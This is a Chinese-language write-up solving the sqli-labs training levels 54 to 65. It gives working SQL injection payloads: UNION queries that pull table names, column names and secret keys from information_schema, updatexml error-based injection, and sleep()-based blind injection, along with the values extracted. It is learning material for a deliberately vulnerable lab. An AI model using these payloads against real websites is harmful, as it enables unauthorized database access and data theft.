Less-54----Less-65

Less-54

进入这关就是一脸懵，只好求助翻译了

可以理解近似于实战，只有十次机会，虽然还可重置哈

那就开始吧，先试试是什么类型

?id=1正常         ?id=1'不正常     ?id=1' and '1正常         ?id=1' and '0不正常,所以是单引号注入

试试联合查询?id=1' union select 1,2,'3，有回显

下面就爆吧（已经知道库名是challenges）：

?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),'3

得到表名：9ml4bj891r

?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='9ml4bj891r'),'3

得到密钥信息的字段名：secret_OR96

?id=-1' union select 1,(select secret_OR96 from challenges.9ml4bj891r),'3

得到密钥：NlmC0biK3OO5B9dCTOvR6QEc

输入密钥提交:

登陆成功

Less-55

试了好久，也重置过

最后试出来原来是闭合换成了) ，其他和54关差不多，就不展示了

Less-56

看着跟前面的一样，应该还是闭合方式的不同

尝试发现闭合换成了')

Less-57

同理  闭合换成了"，不再说

Less-58

经尝试本关不能使用联合查询，可以使用报错注入：

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='CHALLENGES') ),1)--+

得到表名：u5na780ioy

?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from Information_schema.columns where table_name='u5na780ioy' )),1)--+

得到密钥信息的字段名：secret_GFH0

?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_GFH0) from challenges.u5na780ioy )),1)--+

得到密钥输入登陆成功

Less-59

还是报错型盲注，区别是id无包裹

Less-60

还是报错型盲注，")闭合

Less-61

还是报错型盲注，只是闭合方式平常的不一样

都试了一遍不可以，最后看别人的，这个居然是两个括号的  '))   闭合

Less-62

这关居然有130次机会

先是测试出注入类型为')

然后用上几关的报错型发现无报错回显，所以只能换延时注入（感觉是为它量身定做，可以慢慢试，不怕次数不够了）

简单放个payload：?id=1') and If(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=79,0,sleep(5))--+

Less-63

还是延时注入，'  闭合

Less-64

还是延时注入，)) 闭合

Less-65

还是延时注入，")  闭合

这里sqli-labs就结束了，然后因为太菜了，所以我写的里面未包括以下几种手工注入姿势：读文件、写文件、一句话木马。